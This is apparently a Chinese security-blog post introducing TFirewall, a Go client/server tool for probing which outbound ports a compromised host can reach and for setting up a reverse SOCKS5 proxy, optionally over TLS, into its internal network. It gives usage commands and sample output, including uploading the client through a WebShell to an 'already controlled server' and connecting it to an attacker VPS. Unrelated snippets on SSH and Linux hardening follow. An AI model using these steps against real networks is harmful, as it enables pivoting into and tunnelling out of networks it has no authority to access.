防火墙出网探测工具

VSole2022-01-28 06:27:16

TFirewall是测试已控主机哪些端口可以出网及建立内网socks5代理的工具.工具主体使用golang开发,工具包含客户端及服务端,适用于windows,linux,x64,x86.

使用方法

出网检测

  • tfs_linux_amd64上传到VPS服务器(假设VPS的IP地址10.10.10.10)
  • 直接运行.\tfs_linux_amd64 check启动监听,工具会自动监听常用的TOP10端口,或通过 .\tfs_linux_amd64 check 20-23,53,80自定义监听端口
  • 服务端打印如下信息表示监听成功
root@taZ:~# ./tfs_linux_amd64 check 20-23,53,80
Check Server listening:  [20 21 22 23 53 80]
  • 通过WEBShell管理工具将tfc_windows_386.exe上传到已控服务器
  • 运行tfc_windows_386.exe check 10.10.10.10测试TOP10端口哪些可以出网
服务端对应命令.\tfs_linux_amd64 check
  • 运行tfc_windows_386.exe check 10.10.10.10 20-23,53,80探测指定端口
服务端对应命令.\tfs_linux_amd64 check 20-23,53,80
  • 观察服务端输出即可查看客户端可以连接服务端哪些端口,使用什么协议
root@iZj6cbux9hc5eo9oyud2taZ:~# ./tfs_linux_amd64 check 23,80-82
Check Server listening:  [23 80 81]
RecvTCP On 172.17.20.209:23 From 175.132.138.137:16918 
RecvTCP On 172.17.20.209:80 From 175.132.138.137:50641 
RecvTCP On 172.17.20.209:81 From 175.132.138.137:38747 
RecvUDP On [::]:23 From 175.167.138.137:28822
RecvUDP On [::]:80 From 175.167.138.137:26831
RecvUDP On [::]:81 From 175.167.138.137:26832

内网socks5代理

  • tfs_linux_amd64上传到VPS服务器(假设VPS的IP地址10.10.10.10)
  • 通过 .\tfs_linux_amd64 socks5 80 1080在80端口启动控制监听,1080启动内网socks5端口
  • 服务端打印如下信息表示监听成功
root@vultr:~# ./tfs_linux_amd64 socks5 80 1080
Control Listening:  80
Socks5 Listening:  1080
  • 通过WEBShell管理工具将``tfc_windows_386.exe```上传到已控服务器
  • 运行tfc_windows_386.exe socks5 10.10.10.10 80连接服务端
  • 使用10.10.10.10:1080作为内网是socks5代理(11.11.11.11是该内网出口路由器的IP地址)
root@vultr:~# ./tfs_linux_amd64 socks5 80 1080
Control Listening:  80
Socks5 Listening:  1080
Socks5 new socket from :  11.11.11.11:55943
Control new socket from :  11.11.11.11:55789

内网socks5代理(TLS加密)

  • tfs_linux_amd64上传到VPS服务器(假设VPS的IP地址10.10.10.10)
  • 将server.pem(tls公钥),server.key(tls私钥)上传到server_linux_x64相同目录
  • 通过 .\tfs_linux_amd64 socks5 80 1080 tls在80端口启动控制监听,1080启动内网socks5端口
  • 服务端打印如下信息表示监听成功
root@vultr:~# ./tfs_linux_amd64 socks5 80 1080
Control Listening:  80
Socks5 Listening:  1080
  • 通过WEBShell管理工具将tfc_windows_386.exe上传到已控服务器
  • 运行tfc_windows_386.exe socks5 10.10.10.10 80 tls连接服务端
  • 使用10.10.10.10:1080作为内网是socks5代理(11.11.11.11是该内网出口路由器的IP地址)
root@vultr:~# ./tfs_linux_amd64 socks5 80 1080
Control Listening:  80
Socks5 Listening:  1080
Socks5 new socket from :  11.11.11.11:55943
Control new socket from :  11.11.11.11:55789

已测试

server

  • ubuntu 18

client

  • Windows 10
  • ubuntu 16
  • kali

获取方式

公众号后台回复关键词:内网

往期推荐

工具|针对 AWVS扫描器开发的批量扫描脚本

干货|应急响应常用工具

干货|Java内存马注入工具

实战|记一次hw中的上线骚姿势

强荐 | 渗透测试报告自动生成工具

干货|通过 RPC 防火墙停止横向移动

防火墙linux服务器
本作品采用《CC 协议》,转载必须注明作者和本文链接
与传统防火墙不同,Perimeter 81的FWaaS可以立即部署在云端。pfSense的主要优点是持续的支持。OPNsense算是pfSense的分支,是从m0n0wall脱离出来的,始于2015年1月。同时,当m0n0wall在2015年2月关闭时,发明者Manuel Kasper将开发者社区转给了OPNsense。
一个被称为 "EnemyBot" 的快速发展的物联网恶意软件,其攻击目标是内容管理系统(CMS)、网络服务器和Android设备。据研究人员称,目前,威胁攻击组织 "Keksec "被认为是传播该恶意软件的幕后推手。
修改 ssh 登陆配置打开 ssh 配置文件vim?#更改SSH端口,最好改为10000以上,别人扫描到端口的机率也会下降。防火墙要开放配置好的端口号,如果是阿里云服务器,你还需要去阿里云后台配置开发相应的端口才可以,否则登不上哦!
#更改SSH端口,最好改为10000以上,别人扫描到端口的机率也会下降。防火墙要开放配置好的端口号,如果是阿里云服务器,你还需要去阿里云后台配置开发相应的端口才可以,否则登不上哦!如果你觉得麻烦,可以不用改。#禁用版本1协议, 因为其设计缺陷, 很容易使密码被黑掉。关键在于环境变量的不同,su -的环境变量更全面。#禁止空密码登陆。保存,用 uusama 账户登录后,直接获取的就是 root 帐号的权限。
SSH 是一种广泛使用的协议,用于安全地访问 Linux 服务器。但是,不安全的默认配置也会带来各种安全风险。具有开放 SSH 访问权限的服务器的 root 帐户可能存在风险。因此,有必要了解 SSH 安全性。这是在 Linux 上保护 SSH 服务器连接的方法。关闭 root 用户的服务器访问是一种防御策略,可以防止攻击者实现入侵系统的目标。例如,您可以创建一个名为exampleroot的用户,如下所示:useradd?
Linux的应用越来越普遍,且绝大多数嵌入式系统都使用的是Linux系统。但近期,黑客对Linux服务器进行DDoS攻击的次数飙升,受DDoS攻击影响的有70多个国家,其中77%的攻击都发生在中国,最容易受攻击的国家还有法国和荷兰。黑客主要是利用C&C 服务器来集中管理并执行DDoS攻击,Linux服务器便成了其主要的攻击目标。面对如此猖獗的黑客攻击,Linux服务器如何做好预防工作呢?部署
"请用root用户执行此脚本!#最近启动时间?#运行时间(天)?#相同ID的用户?#密码过期(天)?#允许root远程登录?#僵尸进程数量?#自启动服务数量?"系统巡检脚本:Version $VERSION"
Linux 比其他操作系统更安全。但这并不是您在使用 Linux 时可能不需要防病毒软件或防火墙的唯一原因。 Linux 并非无懈可击。事实上,这是让 Linux 用户陷入困境的最常见的网络安全神话之一。这种信念很容易让你放松警惕,而当你放松警惕时,你很可能被狠狠教训一顿。
因此做为运维人员,就必须了解一些安全运维准则,同时,要保护自己所负责的业务,首先要站在攻击者的角度思考问题,修补任何潜在的威胁和漏洞。 本文主要分为如下部分展开:
VSole
网络安全专家